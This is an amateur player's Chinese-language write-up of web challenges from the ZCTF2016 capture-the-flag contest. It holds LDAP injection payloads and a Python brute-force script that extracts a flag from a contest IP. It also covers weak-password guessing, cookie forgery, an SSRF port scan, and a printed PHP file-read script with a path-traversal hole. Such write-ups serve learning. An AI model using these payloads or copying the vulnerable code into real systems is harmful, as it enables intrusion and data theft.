渣渣也去围观ZCTF2016

web150

算是最简单的吧

提示sessionhint=ONYUY2JANZXXIIDGNFXEIILDIFZGKICQ

base32加密

用工具http://emn178.github.io/online-tools/base32_decode.html解密得到sqLi not finD!cAre P

LDAP注入admin/*进入第二关

sessionhint=MNQW4IDZN52SAZTJNZSCA3LZEBSGK43DOJUXA5DJN5XD6===

can you find my description?（莫名其妙的提示，后面才发现如此重要~出题人逆天。。。）

OR注入:(|(uid=*search*)

构造search=)(a= ==> (|(uid=(=)(x=)得到

0 admin
1 test
2 fl4g_is_here

根据提示，第二个参数为description

继续构造search=test)(description=* 爆破得到FLAG

#!/bin/env python
#-*- encoding: utf-8 -*-
#Author:Virink[Isecer]

import time
import urllib
import urllib2

url = 'http://120.24.18.206/search.php'
l = '_0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}'
playload = "test)(description="

while True:
    for i in l:
        values = {'search':playload+i}
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        req.add_header('user-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0');
        req.add_header('cache-control', 'no-cache');
        req.add_header('accept', '*/*');
        req.add_header('Cookie', '你的');
        req.add_header('connection', 'keep-alive');
        req.add_header('Content-Type', 'application/x-www-form-urlencoded');
        response = urllib2.urlopen(req)
        resule = response.read()
        time.sleep(0.5);
        if (resule.find('fl4g_is_here') != -1):
            playload += i
            break;
    print playload[18:]
    if len(playload)>59 or playload.find('}' != -1):
        break;

zctf{303A61ACE0204A2D5F352771D6F1BBA2}

web100

跑弱口令得到两个帐号

niubenben/123456789
zhangwei/123456

明显Cookie验证登陆

于是各种编码、各种加密

最后发现cookie格式为md5(序号+UTF-7(序号))

md5(1+UTF-7(1))=cd53009e0df5b83529120a75f6f28bf6

zctf{x3y7h_b00s}

web400

提示WOOYUN的一个漏洞，SSRF

burp跑端口1-65535。。。结果端口为47001

然而我放一边跑去、结果忘记了、、、结束了才发现、、、ORZ

web500

提示read.php~

?<?php  
$file=isset($_GET['file'])?$_GET['file']:'';
if(empty($file)){
exit('The file parameter is empty,Please input it');    
}

if( preg_match('/.php/',$_SERVER['QUERY_STRING']) && is_file($file) ){
    die("The parameter is not allow contain .php,Please input safe data");
}

if( preg_match('/admin_index|\.\/|admin_xx_modify/i',$file) ){
    die('Error String!');
}

$realfile = 'aaaaaa/../'.$file;

$file1=fopen($realfile,"r");
header("Content-Type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".filesize($realfile));
header("Content-Disposition: attachment; filename=$file");
echo fread($file1,filesize($realfile));
fclose($file1);
?>

构造/read.php?file=/xxx.php把各种源码下载了、、

然而、还没来得及看就到时间了、、、

最后

作为一枚业余的WEB狗、脑洞实在是不够大、、勉强做出两题。。。我觉得、这成绩还成、、毕竟不是大神、也不是赛棍、、

看热闹般路过了这两天的ZCTF、、我只能默默等待Writeup